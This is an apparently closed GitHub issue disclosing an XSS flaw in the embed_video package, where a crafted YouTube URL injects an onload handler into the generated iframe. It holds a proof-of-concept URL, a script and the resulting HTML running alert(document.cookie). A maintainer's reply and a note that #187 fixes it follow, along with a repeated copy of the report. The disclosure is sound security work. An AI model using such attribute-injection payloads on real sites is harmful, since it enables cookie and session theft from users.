Closed Remiz closed 1 year ago
Hi,
I think I've noticed a possible XSS using this package when users are allowed to provide urls. Here is the code I've used reproduce the issue:
import embed_video url = 'https://www.youtube.com/watch?v=\asa\C0DPdy98e4c?wmode=opa\queenablejsapi=1origin=https%3A%2F%2Fwww.aa%22aaaa.com onload=%22javascript:alert(document.cookie)%22' video = embed_video.backends.detect_backend(url) video.is_secure = True print(video.get_embed_code(800, 400))
And here is the result of the embedded code:
<iframe width="800" height="400" src="https://www.youtube.com/embed/sa\C0DPdy98e4c?wmode=opa\queenablejsapi=1origin=https://www.aa"aaaa.com onload="javascript:alert(document.cookie)"?wmode=opaque" loading="lazy" frameborder="0" allowfullscreen></iframe>
It looks like the url encoded double quotes are decoded by urlparse.parse_qs somehow.
Hi and thanks for catching this.
The URL needs to be validated and sanitized. Would anyone happen to have ideas and time for improving the security?
Fixed by #187
Hi,
I think I've noticed a possible XSS using this package when users are allowed to provide urls. Here is the code I've used reproduce the issue:
And here is the result of the embedded code:
It looks like the url encoded double quotes are decoded by urlparse.parse_qs somehow.